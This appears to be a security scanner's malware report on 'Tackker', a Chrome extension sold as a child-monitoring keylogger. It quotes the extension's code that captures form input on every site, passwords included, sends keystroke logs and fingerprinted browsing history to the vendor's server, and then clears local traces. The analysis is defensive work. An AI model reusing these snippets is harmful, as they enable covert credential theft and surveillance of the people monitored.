Security Alert: Malware Risk Confirmed
Free Keylogger Tool - Child Monitor Tackker
ID: ekpkdmohpdnebfedjjfklhpefgpgaaji
Extension Info & Metadata
Publisher Contextual Analysis
- Author: tackker.com
- MX records exist: Yes
- Domain exists: Yes
- Is disposable: No
- Is role-based: No
- Mailbox exists: Yes
Tackker is a free keylogger tool that helps you in Child Monitoring and other ethical monitoring services.
Tackker is an online keylogger tool that helps you log the keystrokes and other user data. It can be used for child monitoring as well as employee monitoring. And now you can also monitor your browsing history. Install Tackker and get peace of mind ;) Tackker has made browser activity monitoring so easy. Monitor any browser activity by following these simple steps:
1) Install tackker on target system browser(s).
2) After installation, you will be directed to register/login (this part is important since without registering you cannot see the logged data).
3) Once you are registered and the plugin is installed, simply monitor user activity from our online dashboard.
The dontLog array explicitly excludes several non-sensitive input types but does NOT exclude type='password'. This means password fields on every banking site, email provider, and social network visited by the victim are captured on focusout and Enter keypress and written to local storage before being exfiltrated. The code runs as a content script matching <all_urls>, so no site is exempt.
```
var watchedElements = ["INPUT", "TEXTAREA"],
    url = window.location,
    dontLog = ["button", "image", "reset", "submit", "radio", "checkbox", "color", "range"];

function getInputValue(t) {
    var e = ~watchedElements.indexOf(t.nodeName) || "true" === t.contentEditable;
    if (-1 === e) {
        if (!~dontLog.indexOf(t.type)) return t.value
    } else {
        if (-2 === e) return t.value;
        if (!0 === e) return t.innerText.trim()
            .replace(/(\n|\r)+/g, " \n")
    }
    return null
}
```
Every 5 minutes (via chrome.alarms), the background service worker POSTs all accumulated keystroke logs (logHistory, which includes captured input values, timestamps, and origin URLs) together with the full browsing history (urlHistory, which includes device fingerprint fields) to https://www.tackker.com/send-data. After a successful response the local store is wiped, removing local forensic evidence. This is a complete exfiltration pipeline covering credential data captured on the victim's device.
```
const payload = {
    app: appId,
    data: logs,
    history: history
};
const response = await fetch("https://www.tackker.com/send-data", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(payload)
});
if (!response.ok) throw new Error(`Server returned status ${response.status}`);
await setStorage({
    logHistory: [],
    urlHistory: [],
});
```
Every page navigation records the full URL, referrer, navigation method, user agent string, OS name, browser name and version, device model, and accept-language header, then stores this record in urlHistory for later exfiltration. This goes beyond the 'Web history' disclosure by attaching a persistent device fingerprint to every record, enabling the remote operator to de-anonymize the victim and correlate activity across sessions regardless of IP changes.
```
var newEntry = {
    'url': document.location.href,
    'content_type': contentType,
    'timestamp': today.getTime(),
    'referrer': lastUrl,
    'navigation_method': navigationMethod,
    'user_agent': navigator.userAgent,
    'scheme': window.location.protocol,
    'host': window.location.host,
    'accept_language': navigator.language,
    'device_manufacturer': 'unknown',
    'device_model': getBasicDeviceModel(),
    'os_name': getOS(),
    'os_version': 'unknown',
    'browser_name': browserInfo.browserName,
    'browser_version': browserInfo.browserVersion,
    'navigation_type': 'foreground-navigation',
    'year': today.getFullYear(),
    'month': today.getMonth() + 1,
    'day': today.getDate(),
}
```
Commented-out code shows a prior version of the extension opened http://intamema.com/5F2c (an obfuscated short-link to an unrelated external domain) once per day via a 50-second polling interval. This pattern (ad/redirect injection hidden in a monitoring tool) is consistent with the socket.dev spamware campaign IoC and indicates the extension has been used to deliver unwanted navigations in addition to keylogging. The code is disabled in this build but is present in the source, indicating the capability was intentional.
```
// window.addEventListener("load", function(){
//   const interval = setInterval(function() {
//     ...
//     chrome.storage.local.get({lastShowed: []}, function (result) {
//       console.log(result.lastShowed);
//       if(new Date(date)>= new Date(result.lastShowed)){
//         window.open('http://intamema.com/5F2c', '_blank');
//         chrome.storage.local.set({lastShowed: date}, function () {});
//       }
//     });
//   }, 50000);
// });
```
Versions scanned
Showing 3 of 18 scanned versions with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 3.1 | 4 |
| 3.0 | 10 |
| 1.7 | 4 |
Files with findings
4 distinct paths — top paths by unique finding count:
- content.js: 12
- back.js: 3
- popup.js: 2
- manifest.json: 1
